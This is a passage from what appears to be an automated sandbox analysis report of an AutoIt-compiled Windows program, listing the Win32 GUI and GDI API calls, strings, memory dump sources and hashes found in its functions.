                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EFAA96
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EFAAB5
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFAAD7
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EFACC4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: fa2ec70a326ef2a0b77397a36c0d355a40b01dc657178e6bc6d0eb8dc95846ae
                                                                                                                                  • Instruction ID: 823190866ffd8638f2839a6c20e0e162919a3e5b167d8844c4ec421ced985c04
                                                                                                                                  • Opcode Fuzzy Hash: fa2ec70a326ef2a0b77397a36c0d355a40b01dc657178e6bc6d0eb8dc95846ae
                                                                                                                                  • Instruction Fuzzy Hash: 9D028171900218EFDB14DF64CD89EAE7BB9FF49310F148159F915AB2A0DB70AD41DB60
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F0D0EB
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F0D11C
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00F0D128
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00F0D142
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00F0D151
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D17C
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00F0D184
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00F0D18B
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00F0D19A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F0D1A1
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0D1EC
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00F0D21E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0D249
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(00000012), ref: 00F0D3BE
                                                                                                                                    • Part of subcall function 00F0D385: SetTextColor.GDI32(?,?), ref: 00F0D3C2
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColorBrush.USER32(0000000F), ref: 00F0D3D8
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(0000000F), ref: 00F0D3E3
                                                                                                                                    • Part of subcall function 00F0D385: GetSysColor.USER32(00000011), ref: 00F0D400
                                                                                                                                    • Part of subcall function 00F0D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0D40E
                                                                                                                                    • Part of subcall function 00F0D385: SelectObject.GDI32(?,00000000), ref: 00F0D41F
                                                                                                                                    • Part of subcall function 00F0D385: SetBkColor.GDI32(?,00000000), ref: 00F0D428
                                                                                                                                    • Part of subcall function 00F0D385: SelectObject.GDI32(?,?), ref: 00F0D435
                                                                                                                                    • Part of subcall function 00F0D385: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D454
                                                                                                                                    • Part of subcall function 00F0D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0D46B
                                                                                                                                    • Part of subcall function 00F0D385: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0D480
                                                                                                                                    • Part of subcall function 00F0D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0D4A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 0e37afa50886470d589b202ed5e10da42942e2ed26106f7cc56891ab0f896863
                                                                                                                                  • Instruction ID: 46177f40527c58776af95f23a74683a9cdc1d62e4d2c073b40d9cfa5c058b2a7
                                                                                                                                  • Opcode Fuzzy Hash: 0e37afa50886470d589b202ed5e10da42942e2ed26106f7cc56891ab0f896863
                                                                                                                                  • Instruction Fuzzy Hash: 2191BE72408305FFDB209FA4DC08E5BBBA9FF89321F140A19F962961E0C775D946EB52
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00EFA42A
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EFA4E9
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EFA527
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EFA539
                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EFA57F
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00EFA58B
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EFA5CF
                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EFA5DE
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EFA5EE
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00EFA5F2
                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EFA602
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EFA60B
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00EFA614
                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EFA642
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EFA659
                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EFA694
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EFA6A8
                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EFA6B9
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EFA6E9
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EFA6F4
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EFA6FF
                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EFA709
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                  • Opcode ID: cfe4dfb3041720cdca015a9e349f3da5d193f51b6d928ac798d5eb0fdf037700
                                                                                                                                  • Instruction ID: fedddffb002aef8695d338ba97fd7f29de99e923be014fbb068bc89071d8b95b
                                                                                                                                  • Opcode Fuzzy Hash: cfe4dfb3041720cdca015a9e349f3da5d193f51b6d928ac798d5eb0fdf037700
                                                                                                                                  • Instruction Fuzzy Hash: 02A161B1A00219BFEB14DBA4DD4AFAE7BB9EF05714F144114F614AB2E0D7B0AD01DB60
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEE45E
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00F3DC88,?,\\.\,00F3DBF0), ref: 00EEE54B
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00F3DC88,?,\\.\,00F3DBF0), ref: 00EEE6B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                  • Opcode ID: d79be43aa02dcd9c89dc379be6b72a394edec82ee70e9e8ec59be0eca9d9e72e
                                                                                                                                  • Instruction ID: c1fb694d58e5b7a2c19c519c2d2a8a8411ff65ec5194d208edb4e779db654521
                                                                                                                                  • Opcode Fuzzy Hash: d79be43aa02dcd9c89dc379be6b72a394edec82ee70e9e8ec59be0eca9d9e72e
                                                                                                                                  • Instruction Fuzzy Hash: 68511B3020838EEBC300DF19C855869B7D1BB95748F21A919F946BB391D731EE49E787
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                  • Opcode ID: 01914d7c3c2b06f4544a75797acd6bbe920bb14a0c93a23a361fb96d90482833
                                                                                                                                  • Instruction ID: f7b9e0ad3d992c6353cfeb2c0b92679b61f1ab62b755b69f331c8072ed3ac3ac
                                                                                                                                  • Opcode Fuzzy Hash: 01914d7c3c2b06f4544a75797acd6bbe920bb14a0c93a23a361fb96d90482833
                                                                                                                                  • Instruction Fuzzy Hash: 72614B31600311B7DB25EA349D42FFA33D8BF0E744F242029FD55BE182EB61EA52D6A1
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32 ref: 00EA4956
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EA4998
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EA49A3
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00EA49AE
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00EA49B9
                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F1E179
                                                                                                                                  • 6F550200.COMCTL32(?,000000FF,?), ref: 00F1E1B2
                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00F1E5E0
                                                                                                                                    • Part of subcall function 00EA49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA4954,00000000), ref: 00EA4A23
                                                                                                                                  • SendMessageW.USER32 ref: 00F1E627
                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F1E63E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2586706302-4108050209
                                                                                                                                  • Opcode ID: 9c7bacf1e7743eb94a3c4d903e0fa8c6ce1eb0eeea91af8e6989bc51e7f82c9d
                                                                                                                                  • Instruction ID: acab18a022e113c874828618ac8d9e953a01df87ece8c149c29d89b8ebce25d0
                                                                                                                                  • Opcode Fuzzy Hash: 9c7bacf1e7743eb94a3c4d903e0fa8c6ce1eb0eeea91af8e6989bc51e7f82c9d
                                                                                                                                  • Instruction Fuzzy Hash: 0512B370A00202DFDB24CF14C884BE6BBE5BF89314F184569F995DB292C771EC96EB91
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00F3DBF0), ref: 00F06245
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                  • Opcode ID: 14aab43935c5c088ec3252d6a1fb53dd2259f7a577675efb384e4e8713cb2663
                                                                                                                                  • Instruction ID: 04121f696b878dac95fe51ce57f149260ac0124f5048515b3e5cdb900c44644d
                                                                                                                                  • Opcode Fuzzy Hash: 14aab43935c5c088ec3252d6a1fb53dd2259f7a577675efb384e4e8713cb2663
                                                                                                                                  • Instruction Fuzzy Hash: C6C1A9342042018BCB08EF14C851AAE77D6AF59354F185469F882AF3D7DB31ED5AFB82
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00F0D3BE
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00F0D3C2
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F0D3D8
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00F0D3E3
                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00F0D3E8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00F0D400
                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0D40E
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00F0D41F
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00F0D428
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00F0D435
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0D454
                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0D46B
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0D480
                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0D4A8
                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0D4CF
                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0D4ED
                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00F0D4F8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00F0D506
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F0D50E
                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0D522
                                                                                                                                  • SelectObject.GDI32(?,00F0D0B5), ref: 00F0D539
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00F0D544
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00F0D54A
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00F0D54F
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00F0D555
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00F0D55F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                  • Opcode ID: 239a60a825d49dca78748c1efcf65398a7ee0fb20a809d51c4193ef6786f7297
                                                                                                                                  • Instruction ID: 88d00c2492087bee83a618acf59d643e3dafe6d8f4de4250f36572d3c1ba9b3a
                                                                                                                                  • Opcode Fuzzy Hash: 239a60a825d49dca78748c1efcf65398a7ee0fb20a809d51c4193ef6786f7297
                                                                                                                                  • Instruction Fuzzy Hash: 72512B72901208AFDF20DFA8DC49EAEBBB9FF08320F244515F915AB2A1D7759941EF50
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F0B5C0
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F0B5D1
                                                                                                                                  • CharNextW.USER32(0000014E), ref: 00F0B600
                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F0B641
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F0B657
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F0B668
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F0B685
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F0B6D7
                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F0B6ED
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F0B71E
                                                                                                                                  • _memset.LIBCMT ref: 00F0B743
                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F0B78C
                                                                                                                                  • _memset.LIBCMT ref: 00F0B7EB
                                                                                                                                  • SendMessageW.USER32 ref: 00F0B815
                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F0B86D
                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00F0B91A
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0B93C
                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00F0B986
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F0B9B3
                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00F0B9C2
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F0B9EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                  • Opcode ID: 0f05ee5edc8bf25b8ea6c14d108192387accf547a689e6813a06c5a343342216
                                                                                                                                  • Instruction ID: 6afa90a4d56ff4c27e4edddd9270234c1eebcbfa41fdbb61f00b740b6fac0059
                                                                                                                                  • Opcode Fuzzy Hash: 0f05ee5edc8bf25b8ea6c14d108192387accf547a689e6813a06c5a343342216
                                                                                                                                  • Instruction Fuzzy Hash: FCE16F71900219ABDB219F54CC84EEE7BB8FF05720F14819AFA15AB2D1DB748A41FF60
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F07587
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00F0759C
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00F075A3
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F07605
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F07631
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F0765A
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F07678
                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F0769E
                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00F076B3
                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F076C6
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00F076E6
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F07701
                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F07715
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0772D
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00F07753
                                                                                                                                  • GetMonitorInfoW.USER32 ref: 00F0776D
                                                                                                                                  • CopyRect.USER32(?,?), ref: 00F07784
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00F077EF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                  • Opcode ID: 9b23fb063df23990f9a08aa67305d6a8d1d3e9b556be94b2dd2137745a45cb9c
                                                                                                                                  • Instruction ID: 64ba59caa808e0a3e2c5fb06b17fa0bd13806307f69ffe6ef123a110f91f0ec8
                                                                                                                                  • Opcode Fuzzy Hash: 9b23fb063df23990f9a08aa67305d6a8d1d3e9b556be94b2dd2137745a45cb9c
                                                                                                                                  • Instruction Fuzzy Hash: 41B1A071A08340AFDB14EF64C944B6ABBE5FF88310F00895DF599AB291DB71EC05EB91
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EBA839
                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00EBA841
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EBA86C
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00EBA874
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00EBA899
                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EBA8B6
                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EBA8C6
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EBA8F9
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EBA90D
                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00EBA92B
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EBA947
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBA952
                                                                                                                                    • Part of subcall function 00EBB736: GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                    • Part of subcall function 00EBB736: ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00EBACEE), ref: 00EBA979
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
